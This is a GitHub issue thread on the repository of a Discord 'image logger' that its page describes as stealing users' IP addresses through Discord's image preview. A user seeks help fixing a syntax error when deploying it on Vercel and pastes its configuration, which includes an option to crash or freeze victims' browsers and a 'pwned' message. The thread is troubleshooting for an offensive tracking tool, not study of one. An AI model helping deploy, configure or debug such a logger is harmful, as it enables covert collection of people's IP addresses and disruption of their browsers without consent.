dekrypted / discord-image-logger

IP Logger that uses discord's "Open Original" feature to steal IP's.
The Unlicense
2.13k stars 575 forks source link

Your code gives me a syntax error in the username field #31

Closed voidsshadows closed 1 year ago

voidsshadows commented 1 year ago

This causes vercel to not start my server

dekrypted commented 1 year ago

show me the username line and the exact error

voidsshadows commented 1 year ago

` # CUSTOMIZATION # "username": "logger", # Set this to the name you want the webhook to have "color": 0x00FFFF, # Hex Color you want for the embed (Example: Red is 0xFF0000)

# OPTIONS #
"crashBrowser": {
    "doCrashBrowser": False, # Tries to crash/freeze the user's browser, may not work. (I MADE THIS, SEE https://github.com/dekrypted/Chromebook-Crasher)
    "customMessage": "This browser has been pwned by DeKrypt's Image Logger. https://github.com/dekrypted/Discord-Image-Logger",
},`

[GET] /api/main.py 04:12:22:47 [ERROR] Runtime.UserCodeSyntaxError: Syntax error in module 'vchandlerpython': invalid syntax (main.py, line 20) Traceback (most recent call last): File "./api/main.py" Line 20 "username": "logger"

voidsshadows commented 1 year ago

looks exactly the same as ur file with the name change

dekrypted commented 1 year ago

idk, but it's an exception in the username field, not my code later down, so you entered something weird. start from scratch.

dekrypted commented 1 year ago

Have you fixed this?

dekrypted commented 1 year ago

Closed - Inactivity